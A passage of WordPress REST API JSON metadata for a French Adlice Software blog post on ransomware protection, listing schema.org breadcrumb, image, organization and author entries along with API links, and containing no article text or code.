Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.","breadcrumb":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","width":754,"height":444},{"@type":"BreadcrumbList","@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.adlice.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Ransomware : Comment s&#8217;en prot\u00e9ger efficacement ?"}]},{"@type":"WebSite","@id":"https:\/\/www.adlice.com\/fr\/#website","url":"https:\/\/www.adlice.com\/fr\/","name":"Adlice Software","description":"Anti-malware and analysis tools","publisher":{"@id":"https:\/\/www.adlice.com\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.adlice.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/www.adlice.com\/fr\/#organization","name":"Adlice Software","url":"https:\/\/www.adlice.com\/fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.adlice.com\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","width":276,"height":276,"caption":"Adlice 
Software"},"image":{"@id":"https:\/\/www.adlice.com\/fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/RogueKiller","https:\/\/x.com\/AdliceSoftware","https:\/\/fr.linkedin.com\/company\/adlice-software","https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ"]},{"@type":"Person","@id":"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d","name":"tigzy","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","caption":"tigzy"},"description":"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog 
posts.","url":"https:\/\/www.adlice.com\/fr\/author\/tigzy\/"}]}},"_links":{"self":[{"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/posts\/428","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/comments?post=428"}],"version-history":[{"count":0,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/posts\/428\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/media\/425"}],"wp:attachment":[{"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/media?parent=428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/categories?post=428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/tags?post=428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}